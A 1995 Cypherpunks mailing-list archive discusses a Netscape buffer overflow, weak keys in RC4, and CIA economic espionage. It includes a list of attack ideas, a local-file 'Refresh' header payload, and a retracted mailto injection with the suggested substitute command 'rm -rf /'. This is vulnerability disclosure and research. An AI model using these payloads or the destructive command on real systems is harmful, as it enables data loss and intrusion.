00:11:25 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 22 Sep 95 00:11:25 PDT Subject: economic espionage (@#$%^&*) Message-ID: <199509220711.AAA02426@ix9.ix.netcom.com> >>> >It was said that Pres. Clinton had given a speech while >>> >visiting the CIA HQ in Langley/Virginia. He allegedly >>> >said in this speech that obtaining industrial >>> >informations has the highest priority and this were the >>> >new task for the spies. Dr. John Deutsch, speaking to the National Press Club, also mentioned economic espionage, with the State Department as a primary customer, but was concerned about definitions of goals, etc. He did reassure the NPC that the CIA would continue to work with drug dealers and corrupt South American military and other scum who have information to sell, as well as cooperating more closely with the FBI and DEA, but on the other hand he does apparently view domestic operations as clearly outside the CIA's job. One set of content in his speech was the planned combination of the various satellite data interpretation organizations into one group of CIA/Pentagon/NRO/NSA/etc. ObCrypto: One questioner asked him about the growing use of encoding and would the CIA be able to keep up eavesdropping on people. "We're very good at eavesdropping" was his main reply; he did acknowledge that there was an issue but didn't go into the party line about needing to have escrow to get GAK. Clinton, meanwhile, reassured guests at a $1000/plate fundraising lunch that the Republicans' economic plans would mainly affect the poor and wouldn't trouble the rich too much... :-) #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From rjc at clark.net Fri Sep 22 00:15:47 1995 From: rjc at clark.net (Ray Cromwell) Date: Fri, 22 Sep 95 00:15:47 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: <9509220652.AA06103@cs.umass.edu> Message-ID: <199509220715.DAA27920@clark.net> > > Ray Cromwell writes: > > I've found a Netscape bug which I suspect is a buffer overflow and > > may have the potential for serious damage. If it is an overflow bug, > > then it may be possible to infect every computer which accesses a web > > page with Netscape. To see the bug, create an html file containing > > the following: > > Oh brother, this is unbelievable ! > > I'm using Netscape 1.1N under SunOS 4.1.2. > > It turns out that the same (or a similar) flaw resides in the Open Location > input routine -- perhaps this merely coincides with the code called when a > URL is clicked. Anyway, pasting a URL with an overlong domain name a la Ray's > example causes two things: > > (1) Part of the Open Location window widget, below the entry box, gets > overwritten onscreen with a portion of the entered URL. > > (2) Netscape crashes with a segmentation fault (no core dump that I can see). The bug causes random things to happen because it trashes the stack. I just did a test with http://aaaaaaa.(repeat pattern 42 times, followed by 5 a's), that's 341 characters in the domain. After a coredump, I inspected the stack, and it has been trashed to hell, including the PC register which was 0x61616161 (or 'aaaa' in ascii) THIS IS A SERIOUS BUG! Unlike the SSL crack (which took a supercomputer to crack), or the RNG (which doesn't affect many people since there is not much internet commerce actually going on), this bug has the potential to damage millions of computers! This is almost enough to scare me away from using netscape. You can guard yourself by always observing the URL you are about to click on, but how many people will be able to keep that up all the time given that Surfing almost puts many people into a trancelike state? [I hear Perry in the background groaning and muttering "I told you so"] These buffer overflow bugs should be taught in every programming 101 course along with fencepost errors. I'm not even sure if I want to write the obligatory program to exploit the hack given that some malicious jerk would probably use it on his home page to attack people. -Ray From halvork at frodo.hiof.no Fri Sep 22 00:20:14 1995 From: halvork at frodo.hiof.no (Halvor Kise jr.) Date: Fri, 22 Sep 95 00:20:14 PDT Subject: Another Netscape Bug (and possible security hole) Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Fri, 22 Sep 1995, Ray Cromwell wrote: > I've found a Netscape bug which I suspect is a buffer overflow and > may have the potential for serious damage. If it is an overflow bug, > then it may be possible to infect every computer which accesses a web > page with Netscape. To see the bug, create an html file containing > the following: Yes! Nice! At last I can include a big Netrape icon on my homepage. Maybye with the text "Netscape users, click here.." All the link does is to crash netscape... At last! Thanks Ray! :-) - - Halvor. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: PGP Signed with PineSign 2.0 iQCVAwUBMGJlamzoaW8/SAL5AQGGigP/Q0K5tT8pAxNp7xigYP3r8WB6oxQXa7n1 G6L9umkfIBhPeZ9hFhCmSNvZLds31qoczl9QW2u+kSV10QYBuDsTlW56R9Hjh6PM /U5h6Ig9eD3jcf74388YEw4iUyKT+kNbcYSiCCvcK22MdA3T8W5ZXpg7f9ODaLSk uVZBl+pEA3Q= =HBzy -----END PGP SIGNATURE----- -- *** MEMENTO MORI *** PGP-key by fingering halvork at frodo.hiof.no http://www.hiof.no/~halvork/ * Support The Phil Zimmermann legal defense fund * http://www.netresponse.com/zldf From goedel at tezcat.com Fri Sep 22 00:24:28 1995 From: goedel at tezcat.com (Dietrich J. Kappe) Date: Fri, 22 Sep 95 00:24:28 PDT Subject: Another Netscape Bug (and possible security hole) Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >Ray Cromwell writes: >> I've found a Netscape bug which I suspect is a buffer overflow and >> may have the potential for serious damage. If it is an overflow bug, >> then it may be possible to infect every computer which accesses a web >> page with Netscape. To see the bug, create an html file containing >> the following: > >Oh brother, this is unbelievable ! > >I'm using Netscape 1.1N under SunOS 4.1.2. > >It turns out that the same (or a similar) flaw resides in the Open Location >input routine -- perhaps this merely coincides with the code called when a >URL is clicked. Anyway, pasting a URL with an overlong domain name a la Ray's >example causes two things: > >(1) Part of the Open Location window widget, below the entry box, gets >overwritten onscreen with a portion of the entered URL. > >(2) Netscape crashes with a segmentation fault (no core dump that I can see). Netscape 1.1N on a powermac crashes hard on that url. If anyone wants to try it out, I've put up a simple page with the url at http://www.redweb.com/experiment/bug.html *warning* view the source before you click on strange links!!! I don't do PPC assembler, so I can't tell you what happened. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBgAwUBMGJysHIf3YegbdiBAQF/RAJWNVXvLgyPEjVVoGUNoX/AqKlIiT5Axmek +dCoGJy6CMcP7fq3rB+DAt+SziIaG2X+rUSLt8ih39TBjD1FLAKKsE/VhBHJrp+v pSoO =jfLP -----END PGP SIGNATURE----- From jsw at neon.netscape.com Fri Sep 22 00:34:29 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Fri, 22 Sep 95 00:34:29 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: <199509220612.CAA11441@clark.net> Message-ID: <43tosm$qfe@tera.mcom.com> In article <199509220612.CAA11441 at clark.net>, rjc at clark.net (Ray Cromwell) writes: > I've found a Netscape bug which I suspect is a buffer overflow and > may have the potential for serious damage. If it is an overflow bug, > then it may be possible to infect every computer which accesses a web > page with Netscape. To see the bug, create an html file containing > the following: Thanks for the report. I will make sure that this is fixed. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From jsw at neon.netscape.com Fri Sep 22 00:53:01 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Fri, 22 Sep 95 00:53:01 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: Message-ID: <43tpv8$rom@tera.mcom.com> OK, Perry was right, and it was wrong of me to argue with him based only on the code that I have personally seen. As we have already determined, I have not reviewed every line of code in netscape. Not that I want to divert attention away from netscape(OK, maybe I do :-) ), but does this bug exist in any other common browser? --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From futplex at pseudonym.com Fri Sep 22 01:01:26 1995 From: futplex at pseudonym.com (Futplex) Date: Fri, 22 Sep 95 01:01:26 PDT Subject: Mosaic Bug (same as Netscape bug) (was Re: Another Netscape Bug) In-Reply-To: <43tpv8$rom@tera.mcom.com> Message-ID: <9509220801.AA06875@cs.umass.edu> Jeff Weinstein writes: > Not that I want to divert attention away from netscape(OK, maybe I > do :-) ), but does this bug exist in any other common browser? Good question. Here's one answer, obtained using a minor variation on Ray's URL: ---------------------------------------------- Congratulations, you have found a bug in NCSA Mosaic 2.4 on Sun. If a core file was generated in your directory, please run 'dbx Mosaic' (or 'dbx /path/Mosaic' if the Mosaic executable is not in your current directory) and then type: dbx> where and mail the results, and a description of what you were doing at the time, to mosaic-x at ncsa.uiuc.edu. We thank you for your support. ...exiting NCSA Mosaic now. ---------------------------------------------------- Now, the question is, does Netscape use _the same code_ that was used in Mosaic for this purpose ? -Futplex From unicorn at polaris.mindport.net Fri Sep 22 01:01:44 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Fri, 22 Sep 95 01:01:44 PDT Subject: economic espionage (@#$%^&*) In-Reply-To: <199509220711.AAA02426@ix9.ix.netcom.com> Message-ID: On Fri, 22 Sep 1995, Bill Stewart wrote: > > >>> >It was said that Pres. Clinton had given a speech while > >>> >visiting the CIA HQ in Langley/Virginia. He allegedly > >>> >said in this speech that obtaining industrial > >>> >informations has the highest priority and this were the > >>> >new task for the spies. > > Dr. John Deutsch, speaking to the National Press Club, also mentioned > economic espionage, with the State Department as a primary > customer, but was concerned about definitions of goals, etc. > He did reassure the NPC that the CIA would continue to work with > drug dealers and corrupt South American military and other scum > who have information to sell, as well as cooperating more closely > with the FBI and DEA, but on the other hand he does apparently > view domestic operations as clearly outside the CIA's job. > One set of content in his speech was the planned combination of > the various satellite data interpretation organizations > into one group of CIA/Pentagon/NRO/NSA/etc. It's important here to distinguish economic "espionage" and economic "intelligence." Espionage refers to the stealing of secrets with humint, and genrally the term economic espionage refers to the actual thefts as with the French government stealing bids, and bag jobbing American businessmen. Economic Intelligence is much older, and is more about economic analysis on a macro scale of the target country. I mention these because the doublespeak can trip up people who aren't used to what the intelligence types are saying. John Deutsch is definately an economic intelligence man, but has in past been quite opposed to economic espionage. > > ObCrypto: One questioner asked him about the growing use > of encoding and would the CIA be able to keep up eavesdropping on > people. "We're very good at eavesdropping" was his main reply; > he did acknowledge that there was an issue but didn't go into > the party line about needing to have escrow to get GAK. > > Clinton, meanwhile, reassured guests at a $1000/plate fundraising > lunch that the Republicans' economic plans would mainly affect > the poor and wouldn't trouble the rich too much... :-) > #--- > # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com > # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 > #--- > > --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From futplex at pseudonym.com Fri Sep 22 01:14:47 1995 From: futplex at pseudonym.com (Futplex) Date: Fri, 22 Sep 95 01:14:47 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: <199509220715.DAA27920@clark.net> Message-ID: <9509220814.AA06967@cs.umass.edu> On the bright side, mailto: hyperlinks containing extra-long domain names seem to be handled comparatively safely in both Netscape and Mosaic. (Perhaps they just have longer buffers ? ;) Neither Netscape nor Mosaic crashes on a mailto:// of the same length as a ftp:// or http:// that _would_ crash them. Netscape appears to do some sort of truncation at some point (silently); Mosaic gives you a standard "server is not accessible or is refusing to serve the document" warning page. (Netscape 1.1N, Mosaic 2.4, SunOS 4.1.2) -Futplex From rjc at clark.net Fri Sep 22 01:20:30 1995 From: rjc at clark.net (Ray Cromwell) Date: Fri, 22 Sep 95 01:20:30 PDT Subject: Netscape Server Attacks Message-ID: <199509220820.EAA12405@clark.net> No, calmdown, I haven't found a hole in the server yet, but if you want to win some T-Shirts, here's some potential avenues to try. I've been messing with these, and maybe some other c'punk can find one that will work. 1) buffer overflow attacks in the HTTP request header Example: The HTTP/1.0 full request has an "If-Modified-Since" header which takes a date string. If Netscape assumes this string is not going to be longer than a certain width.... Look for ways to attack the HTTP request headers. See http://www.w3.org/pub/WWW/Protocols/HTTP1.0/draft-ietf-http-spec.html CGI attacks 2)Shell metacharacters, or extremely long paths, may lead the way to executing arbitrary shell commands on the server. 3) Overflow the URL in a CGI GET by using too many form variables in the response. Server attacking client 4) use the Location: redirection header to send a long domain 5) use Location: redirection or Refresh: to load up file:localfile You can force the browser to load up any arbitrary file the user has access to local to his client Example: Refresh: 1 file:config.sys 6) send back a page with an EXTREME number of Motif HTML FORM widgets in a
. E.g. send back 10,000 radio buttons. Happy Hunting, -Ray From futplex at pseudonym.com Fri Sep 22 01:27:11 1995 From: futplex at pseudonym.com (Futplex) Date: Fri, 22 Sep 95 01:27:11 PDT Subject: Patents and trade secrets was: Encryption algorithms used in PrivaSoft In-Reply-To: <199509220519.BAA02311@frankenstein.piermont.com> Message-ID: <9509220827.AA07056@cs.umass.edu> David Van Wie writes: > It just moves the prior art date from the date of invention to the date > of filing the patent application. .pm writes: > Can you explain that? It doesn't make much sense... I'll ask a more specific question: What happens if the chronology goes like this ? (0) Alice invents a snaffleblort. (1) Bob invents a snaffleblort. (2) Bob files for a patent on a snaffleblort. >From what you said, it would appear that Alice's prior art won't count when it comes to considering the validity of Bob's patent claim. Is that correct ? -Futplex From rjc at clark.net Fri Sep 22 01:30:13 1995 From: rjc at clark.net (Ray Cromwell) Date: Fri, 22 Sep 95 01:30:13 PDT Subject: YET ANOTHER BAD NETSCAPE HOLE! In-Reply-To: <9509220814.AA06967@cs.umass.edu> Message-ID: <199509220830.EAA13828@clark.net> > > On the bright side, mailto: hyperlinks containing extra-long domain names > seem to be handled comparatively safely in both Netscape and Mosaic. > (Perhaps they just have longer buffers ? ;) Good question. My guess is, Netscape doesn't do any processing on the mailto: hyperlink at all, but merely passes it to a real mail delivery agent like Sendmail (or it uses MAPI under Win'95). Which begs the question, if Netscape is executing an external delivery agent, there may be the possiblity of sneaking an attack in there and getting the shell to execute something. Hmm, let me try something. WOW!! Unbelievable! Stop the presses! I Can't believe no one ever discovered this before! Try a page with the following URL test Muahaha! Yet another security hole! Clicking on this mailto brings up an xterm on my machine! Simply change the xterm& to "rm -rf /" and bingo! Sheesh. I better stop before I am on Netscape's most hated list. -Ray From rjc at clark.net Fri Sep 22 01:37:09 1995 From: rjc at clark.net (Ray Cromwell) Date: Fri, 22 Sep 95 01:37:09 PDT Subject: YET ANOTHER BAD NETSCAPE HOLE! In-Reply-To: <199509220830.EAA13828@clark.net> Message-ID: <199509220836.EAA14476@clark.net> Disregard that last message. Those drugs I was taking must have just kicked in. I was running another program in the background which coincidentally brought up an xterm at the same time I clicked on the link. Damn, and I thought I had found another bug. Ah well. There's probably one lurking there somewhere. It was good while it lasted. When I hit "send" and that xterm popped up, I almost jumped out of my seat. ;-) Remember this lesson, you should always try to repeat your bugs atleast three times. ;-) -Ray From futplex at pseudonym.com Fri Sep 22 01:50:22 1995 From: futplex at pseudonym.com (Futplex) Date: Fri, 22 Sep 95 01:50:22 PDT Subject: YET ANOTHER BAD NETSCAPE HOLE! In-Reply-To: <199509220830.EAA13828@clark.net> Message-ID: <9509220850.AA07248@cs.umass.edu> Ray Cromwell writes: > WOW!! Unbelievable! Stop the presses! I Can't believe no one ever discovered > this before! Try a page with the following URL > > test > > Muahaha! Yet another security hole! Clicking on this mailto brings up > an xterm on my machine! This is curious, because Netscape 1.1N doesn't do this on my setup, unless I misunderstand your description somehow. The full string including the pipe and all come up in the To: field of the standard Netscape mailer window. At that stage I see it as much less of a potential risk. I can't test what happens if you actually try to send mail to such a trojan horse URL, because there's some screwy configuration here that makes Netscape complain about not being able to connect to localhost (!?!) when I try to send mail from it. Mosaic 2.4 gives a standard warning page in response to this. (I'm using SunOS 4.1.2) -Futplex From futplex at pseudonym.com Fri Sep 22 02:01:29 1995 From: futplex at pseudonym.com (Futplex) Date: Fri, 22 Sep 95 02:01:29 PDT Subject: The Next Hack In-Reply-To: <199509211832.LAA24086@infinity.c2.org> Message-ID: <9509220901.AA07381@cs.umass.edu> sameer writes: > 2) Organize a net-wide search over the space of the RNG seed to > crack the private key of some well known secure server. > > 3) Release the private key to the net. FWIW, for the record, I'm uncomfortable with this. It sounds unethical, IMHO. For me at least, targeting the key of some particular server that happens to be out there is over the line. If you said you would have someone volunteer a supposedly secure server for the challenge, I'd have no qualms. But hey, that's just one tentacle's opinion.... -Futplex "...when you talk about destruction, don't you know that you can count me out" From jsw at neon.netscape.com Fri Sep 22 02:22:41 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Fri, 22 Sep 95 02:22:41 PDT Subject: Mosaic Bug (same as Netscape bug) (was Re: Another Netscape Bug) In-Reply-To: <43tpv8$rom@tera.mcom.com> Message-ID: <43tv6v$t7v@tera.mcom.com> In article <9509220801.AA06875 at cs.umass.edu>, futplex at pseudonym.com (Futplex) writes: > Now, the question is, does Netscape use _the same code_ that was used in > Mosaic for this purpose ? Absolutely not. There is not a single line of Mosaic code in our product. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From halvork at frodo.hiof.no Fri Sep 22 02:25:51 1995 From: halvork at frodo.hiof.no (Halvor Kise jr.) Date: Fri, 22 Sep 95 02:25:51 PDT Subject: Arena as well (was: Netscape Bug) Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I am sorry to report that also Arena has this bug.. :-( - - Halvor. Ray Cromwell said: I've found a Netscape bug which I suspect is a buffer overflow and may have the potential for serious damage. If it is an overflow bug, then it may be possible to infect every computer which accesses a web page with Netscape. To see the bug, create an html file containing the following: that xterm popped up, I almost jumped out of my seat. ;-) Remember > this lesson, you should always try to repeat your bugs atleast three > times. ;-) Thanks for quickly posting this retraction. For the record, netscape talks SMTP directly, and does not run an external program to send mail. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From rjc at clark.net Fri Sep 22 02:36:12 1995 From: rjc at clark.net (Ray Cromwell) Date: Fri, 22 Sep 95 02:36:12 PDT Subject: YET ANOTHER BAD NETSCAPE HOLE! In-Reply-To: <43tvj4$t7v@tera.mcom.com> Message-ID: <199509220936.FAA21793@clark.net> > > In article <199509220836.EAA14476 at clark.net>, rjc at clark.net (Ray Cromwell) writes: > > Disregard that last message. Those drugs I was taking must have just kicked > > in. I was running another program in the background which coincidentally > > brought up an xterm at the same time I clicked on the link. Damn, > > and I thought I had found another bug. Ah well. There's probably one lurking > > there somewhere. It was good while it lasted. When I hit "send" and > > that xterm popped up, I almost jumped out of my seat. ;-) Remember > > this lesson, you should always try to repeat your bugs atleast three > > times. ;-) > > Thanks for quickly posting this retraction. For the record, netscape > talks SMTP directly, and does not run an external program to send mail. No problem. ;-) I congratulate you guys (Netscape) for reacting so quickly. ;-) BTW, I checked lynx for the big domain bug and it also crashes. It could be a unix bug, but my own test program fails to crash looking up a 1000 character domain. Even so, Netscape should be enforcing a sanity check on the domain. -Ray From heesen at zpr.uni-koeln.de Fri Sep 22 02:46:54 1995 From: heesen at zpr.uni-koeln.de (Rainer Heesen) Date: Fri, 22 Sep 95 02:46:54 PDT Subject: YET ANOTHER BAD NETSCAPE HOLE! In-Reply-To: <9509220850.AA07248@cs.umass.edu> Message-ID: <9509221146.ZM25754@Sysiphos.MI.Uni-Koeln.DE> On Sep 22, 4:50am, Futplex wrote: > Subject: Re: YET ANOTHER BAD NETSCAPE HOLE! > Ray Cromwell writes: > > WOW!! Unbelievable! Stop the presses! I Can't believe no one ever discovered > > this before! Try a page with the following URL > > > > test > > > > Muahaha! Yet another security hole! Clicking on this mailto brings up > > an xterm on my machine! > > This is curious, because Netscape 1.1N doesn't do this on my setup, unless I > misunderstand your description somehow. The full string including the pipe > and all come up in the To: field of the standard Netscape mailer window. At > that stage I see it as much less of a potential risk. I can't test what > happens if you actually try to send mail to such a trojan horse URL, because > there's some screwy configuration here that makes Netscape complain about > not being able to connect to localhost (!?!) when I try to send mail from it. > > Mosaic 2.4 gives a standard warning page in response to this. > > (I'm using SunOS 4.1.2) > > -Futplex >-- End of excerpt from Futplex This is not curious. Ray uses a very old sendmail version. It's not a Netscape bug, it's rather a sendmail bug. Cheers Rainer From AndrewR at beetle.vironix.co.za Fri Sep 22 03:01:07 1995 From: AndrewR at beetle.vironix.co.za (Andrew Roos) Date: Fri, 22 Sep 95 03:01:07 PDT Subject: Weak Keys in RC4 Message-ID: <3062899D@beetle.vironix.co.za> -----BEGIN PGP SIGNED MESSAGE----- A CLASS OF WEAK KEYS IN THE RC4 STREAM CIPHER PRELIMINARY DRAFT ANDREW ROOS VIRONIX SOFTWARE LABORATORIES 1. INTRODUCTION This paper discusses a class of weak keys in RSA's RC4 stream cipher. It shows that for at least 1 out of every 256 possible keys the initial byte of the pseudo-random stream generated by RC4 is strongly correlated with only a few bytes of the key, which effecitively reduces the work required to exhaustively search RC4 key spaces. 2. STATE TABLE INITIALIZATION IN RC4 Although the RC4 algorithm has not been published by RSA Data Security, source code to implement the algorithm was anonymously posted to the Cypherpunks mailing list several months ago. The success of the Cypherpunks' brute-force attack on SSL with a 40-bit key indicates that the source code published did accurately implement RC4. RC4 uses a variable length key from 1 to 256 bytes to initialize a 256-byte state table which is used for the subsequent generation of pseudo-random bytes. The state table is first initialized to the sequence {0,1,2,...,255}. Then: 1 index1 = 0; 2 index2 = 0; 3 4 for(counter = 0; counter < 256; counter++) 5 { 6 index2 = (key_data_ptr[index1] + state[counter] + index2) % 256; 7 swap_byte(&state[counter], &state[index2]); 8 index1 = (index1 + 1) % key_data_len; 9 } Note that the only line which directly affects the state table is line 7, when two bytes in the table are exchanged. The first byte is indexed by "counter", which is incremented for each iteration of the loop. The second byte is indexed by "index2" which is a function of the key. Hence each element of the state table will be swapped at least once (although possibly with itself), when it is indexed by "counter". It may also be swapped zero, one or more times when it is indexed by "index2". If we assume for the moment that "index2" is a uniformly distributed pseudo-random number, then the probability that a particular single element of the state table will be indexed by "index2" at some time during the initialization routine is: P = 1 - (255/256) ^ 255 = 0.631 (The exponent is 255 because we can disregard the case when "index2" and "counter" both index the same element, since this will not affect its value.) Conversely, there is a 37% probability that a particular element will _not_ be indexed by "index2" during initialization, so its final value in the state table will only be affected by a single swap, when it is indexed by "counter". Since key bytes are used sequentially (starting again at the beginning when the key is exhausted), this implies: A. Given a key length of K bytes, and E < K, there is a 37% probability that element E of the state table depends only on elements 0..E (inclusive) of the key. (This is approximate since "index2" is unlikely to be uniformly distributed.) In order to make use of this, we need to determine the most likely values for elements of the state table. Since each element is swapped at least once (when it is indexed by "counter"), it is necessary to take into account the likely effect of this swap. Swapping is a nasty non-linear process which is hard to analyze. However, when dealing with the first few elements of the state table, there is a high probability that the byte with which the element is swapped has not itself been involved in any previous exchanges, and therefore retains its initial value {0,1,2,...,255}. Similarly, when dealing with the first few elements of the state table, there is also a significant probability that none of the state elements added to index2 in line 6 of the algorithm has been swapped either. This means that the most likely value of an element in the state table can be estimated by assuming that state[x] == x in the algorithm above. In this case, the algorithm becomes: 1 index1 = 0; 2 index2 = 0; 3 4 for(counter = 0; counter < 256; counter++) 5 { 6 index2 = (key_data_ptr[index1] + counter + index2) % 256; 7 state[counter] = index2; 8 index1 = (index1 + 1) % key_data_len; 9 } Which can be reduced to: B. The most likely value for element E of the state table is: S[E] = X(E) + E(E+1)/2 where X(E) is the sum of bytes 0..E (inclusive) of the key. (when calculating the sum of key elements, the key is considered to "wrap around" on itself). Given this analysis, we can calculate the probability for each element of the state table that it's value is the "most likely value" of B above. The easiest way to do this is to evaluate the state tables produced from a number of pseudo-randomly generated RC4 keys. The following table shows the results for the first 47 elements from a trial of 100 000 eighty-bit RC4 keys: Probability (%) 0-7 37.0 36.8 36.2 35.8 34.9 34.0 33.0 32.2 8-15 30.9 29.8 28.5 27.5 26.0 24.5 22.9 21.6 16-23 20.3 18.9 17.3 16.1 14.7 13.5 12.4 11.2 24-31 10.1 9.0 8.2 7.4 6.4 5.7 5.1 4.4 32-39 3.9 3.5 3.0 2.6 2.3 2.0 1.7 1.4 40-47 1.3 1.2 1.0 0.9 0.8 0.7 0.6 0.6 The table confirms that there is a significant correlation between the first few values in the state table and the "likely value" predicted by B. 3. WEAK KEYS The RC4 state table is used to generate a pseudo-random stream which is XORed with the plaintext to give the ciphertext. The algorithm used to generate the stream is as follows: x and y are initialized to 0. To generate each byte: 1 x = (x + 1) % 256; 2 y = (state[x] + y) % 256; 3 swap_byte(&state[x], &state[y]); 4 xorIndex = (state[x] + state[y]) % 256; 5 GeneratedByte = state[xorIndex]; One way to exploit our analysis of the state table is to find circumstances under which one or more generated bytes are strongly correlated with a small subset of the key bytes. Consider what happens when generating the first byte if state[1] == 1. 1 x = (0 + 1) % 256; /* x == 1 */ 2 y = (state[1] + 0) % 256; /* y == 1 */ 3 swap_byte(&state[1], &state[1]); /* no effect */ 4 xorIndex = (state[1] + state[1]); /* xorIndex = 2 */ 5 GeneratedByte = state[2] And we know that state[2] is has a high probability of being S[2] = K[0] + K[1] + K[2] + 2 (2+1) / 2 Similarly, S[1] = K[0] + K[1] + 1 (1+1) / 2 So to make it probable that S[1] == 1, we have: K[0] + K[1] == 0 (mod 256) In which case the most likely value for S[2] is: S[2] = K[2] + 3 This allows us to identify a class of weak keys: C. Given an RC4 key K[0]..K[N] with K[0] + K[1] == 0 (mod 256), there is a significant probability that the first byte generated by RC4 will be K[2] + 3 (mod 256). Note that there are two special cases, caused by "unexpected" swapping during key generation. When K[0]==1, the "expected" output byte is k[2] + 2, and when k[0]==2, the expected value is k[2] + 1. There are a number of similar classes of "weak keys" which only affect a few keys out of every 65536. However the particular symmetry in this class means that it affects one key in 256, making it the most interesting instance. Once again I took the easy way out and used simulation to determine the approximate probability that result C holds for any given key. Probabilities ranged between 12% and 16% depending on the values of K[0] and K[1], with a mean of about 13.8%. All these figures are significantly greater than the 0.39% which would be expected from an uncorrelated generator. The key length used was again 80 bits. This works the other way around as well: given the first byte B[0] generated by a weak key, the probability that K[2]==B[0]-3 (mod 256) is 13.8%. 4. EXPLOITING WEAK KEYS IN RC4 Having found a class of weak keys, we need a practical way to attack RC4 based cryptosystems using them. The most obvious way would be to search potential weak keys first during an exhaustive attack. However since only one in every 256 keys is weak, the effective reduction in search space is not particularly significant. The usefulness of weak keys does increase if the opponent is satisfied with recovering only a percentage of the keys subjected to analysis. Given a known generator output which includes the first generated byte, one could assume that the key was weak and search only the weak keys which would generate the known initial byte. Since 1 in 256 keys is weak, and there is a 13.8% chance that the assumed value of K[2] will be correct, there is only a 0.054% chance of finding the key this way. However, you have reduced the search space by 16 bits due to the assumed relationship between K[0] and K[1] and the assumed value of K[2], so the work factor per key recovered is reduced by a factor of 35, which is equivalent reducing the effective key length by 5.1 bits. However in particular circumstances, the known relationships between weak keys may provide a much more significant reduction in workload. The remainder of this section describes an attack which, although requiring very specific conditions, illustrates the potential threat. As a stream cipher, a particular RC4 key can only be used once. When multiple communications sessions are required, some mechanism must be provided for generating a new session key each time. Let us suppose that an implementation chose the simple method of incrementing the previous session key to get the new session key, and that the session key was treated as a "little endian" (least significant byte first) integer for this purpose. We now have the interesting situation that the session keys will "cycle through" weak keys in a pattern which repeats every 2^16 keys: 00 00 00 ... Weak (510 non-weak keys) FF 01 00 ... Weak (254 non-weak keys) FE 02 00 ... Weak (254 non-weak keys) FD 03 00 ... Weak ... 01 FF 00 ... Weak (254 non-weak keys) 00 00 01 ... Weak (510 non-weak keys) FF 01 01 ... Weak (Least significant byte on the left) Now while an isolated weak key cannot be identified simply from a known generator output, this cycle of weak keys at known intervals can be identified using statistical techniques since each of the weak keys has a higher than expected probability of generating the _same_ initial byte. This means that an opponent who knew the initial generated bytes of about 2^16 session keys could identify the weak keys, and would also be able to locate the 510-key gap between successive cycles of weak keys (although not precisely). Since the 510-key gap occurs immediately following a key which begins with 00 00, the opponent not only knows that the keys are weak, but also knows the first two bytes of each key. The third byte of each key can be guessed from the first output byte generated by the key, with a 13.8% chance of a correct guess. Assuming that the "510-key gap" is narrowed down to 1 of 8 weak keys, the attacker can search a key space which is 24 bits less than the size of the session keys, with a 13.8%/8 chance of success, effectively reducing the key space by approximately 18 bits. Although this particular attack depends on a very specific set of circumstances, it is likely that other RC4 based cryptosystems in which there are linear relationships between successive session keys could be vulnerable to similar attacks. 5. RECOMMENDATIONS The attacks described in this algorithm result from inadequate "mixing" of key bytes during the generation of the RC4 state table. The following measures could be taken to strengthen cryptosystems based on the RC4 algorithm: (a) After initializing the algorithm, generate and discard a number of bytes. Since the algorithm used to generate bytes also introduces additional non-linear dependencies into the state table, this would make analysis more difficult. (b) In systems which require multiple session keys, ensure that session keys are not linearly related to each other. (c) Avoid using the weak keys described. 6. CONCLUSION This preliminary analysis of RC4 shows that the algorithm is vulnerable to analytic attacks based on statistical analysis of its state table. It is likely that a more detailed analysis of the algorithm will reveal more effective ways to exploit the weaknesses described. Andrew Roos -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMGLAk2atuqa4OR+lAQGYJQQA1W2r/giH1iPxeLRjooPEvAJJO2GHrBNy h1fjHhPf6uBhBapEyZfN5utaUZYkkz/3tXJQC1p+17XwAJHGxb6kapHl3tAf2k5B P7C034fo8WIOmam1GQqlG3c1MPjCvkNY02NEkYAmNtcwKMP96QgDMCbvS0kn55WE L1GOWMVYqO4= =iogI -----END PGP SIGNATURE----- From dl at hplyot.obspm.fr Fri Sep 22 03:10:38 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Fri, 22 Sep 95 03:10:38 PDT Subject: Netscape to end Linux support? In-Reply-To: <199509212125.RAA00188@hoopsnake.cjs.net> Message-ID: <9509221008.AA18570@hplyot.obspm.fr> Jeff Simmons writes: > > And the sad part is that now that they have announced that they are > > dropping their unofficial Linux support, I really want to hurt > > Netscape badly. > > Sigh. > Anyone got a pointer to this announcement? > Damn! Just when I was starting to like them ... Hmm, I was also thinking good about responsiveness on the security issue (though the way they behave regarding html extensions is still not fair imo, but that's another debate), and I have modified my netscape security page accordingly, but, dropping Linux as the list of UNIX supported host is certainly not a good thing at all, I urge/pray/suggest... that listening Netscape folks here try to put it back, PLEASE (It is not that difficult to compile under linux is it ?) (source : http://www.netscape.com/comprod/products/navigator/version_2.0/datasheet.html [...] SUPPORTED PLATFORMS [...] UNIX: Digital Equipment Corp. 